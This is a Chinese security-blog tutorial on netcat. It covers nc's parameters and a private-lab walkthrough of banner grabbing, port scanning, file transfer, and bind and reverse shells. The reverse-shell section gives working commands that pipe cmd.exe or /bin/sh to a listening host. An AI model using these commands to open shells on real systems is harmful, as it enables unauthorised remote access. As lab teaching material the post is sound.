freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

NC的简单使用
严道长 2021-05-17 17:08:15 149503

什么是NC:

nc是netcat的简写,有着网络界的瑞士军dao美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具

NC的作用:

1.实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口

2.端口的扫描,nc可以作为client发起TCP或UDP连接

3.机器之间传输文件

4.机器之间网络测速

NC的常用参数如下:

-g<网关> 设置路由器跃程通信网关,最多可设置8个。

-G<指向器数目> 设置来源路由指向器,其数值为4的倍数。

-h 在线帮助。

-i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口。

-l 使用监听模式,管控传入的资料。

-n 直接使用IP地址,而不通过域名服务器。

-o<输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。

-p<通信端口> 设置本地主机使用的通信端口。

-r 乱数指定本地与远端主机的通信端口。

-s<来源地址> 设置本地主机送出数据包的IP地址。

-u 使用UDP传输协议。

-v 显示指令执行过程。

-w<超时秒数> 设置等待连线的时间。

-z 使用0输入/输出模式,只在扫描通信端口时使用。

实验环境:

操作系统                                IP

win7(vps)                           192.168.123.11

web服务器                              192.168.123.18

(PS:首先要进入nc目录下)

1.抓取banner信息:

nc -nv 192.168.123.11 21   未启用

nc -nv 192.168.123.11 445   启用

1621241611_60a22f0b8fcd97f547139.png!small?1621241612217

2.端口扫描(不推荐,效率不高很慢,多端口基本等于卡死)

nc -v 192.168.123.11 80

nc -v 192.168.123.11 445

1621241625_60a22f1934fb2b8cc74f3.png!small?1621241625427

3.简单传输数据

vps:nc.exe -l -p 8888

web服务器:nc.exe -vn 192.168.128.11 8888

1621241653_60a22f355fde4f2a683a3.png!small?1621241653643

1621241660_60a22f3c25ca601acf0a9.png!small?1621241660313

4.反弹shell

shell分为正向shell,另一种为反向shell。

反向shell一般在开启了防护措施的服务器上使用。

1)正向shell

vps链接目标主机

web服务器下:nc.exe -lvp 4444 -e c:\windows\system32\cmd.exe

(linux下:nc x.x.x.x 4444 -e /bin/sh #Linux)

(注意是小写l,不是数字1。 -lvp:监听模式启用,可视过程,设置端口)

1621241675_60a22f4bc7ccf5b8c8c69.png!small?1621241676092

vps接收:nc.exe 192.168.123.8 4444

1621241679_60a22f4f45364cb48187c.png!small?1621241679413

2)反向shell

在vps上做监听:nc.exe -lvp 4444

1621241684_60a22f54759322ab9dafb.png!small?1621241684538

在web服务器上进行反弹:nc.exe 192.168.123.11 4444 -e c:\windows\system32\cmd.exe

(linux下:nc x.x.x.x 4444 -e /bin/sh #Linux))

1621241689_60a22f598ad9c7c00fab3.png!small?1621241689706

结果:

1621241693_60a22f5d68eaf251143a2.png!small?1621241693554

同样感谢余师傅的虚拟机

不同的环境会有一些不同的问题,欢迎讨论,随时编辑补充。

# netcat
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 严道长 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
内网靶机路
严道长 LV.3
这家伙太懒了,还未填写个人描述!
  • 5 文章数
  • 21 关注者
WIFI无线安全(仅个人网络实验)
2021-06-24
powercat使用分享(1)
2021-05-03
关于内网信息收集-1
2021-04-25
文章目录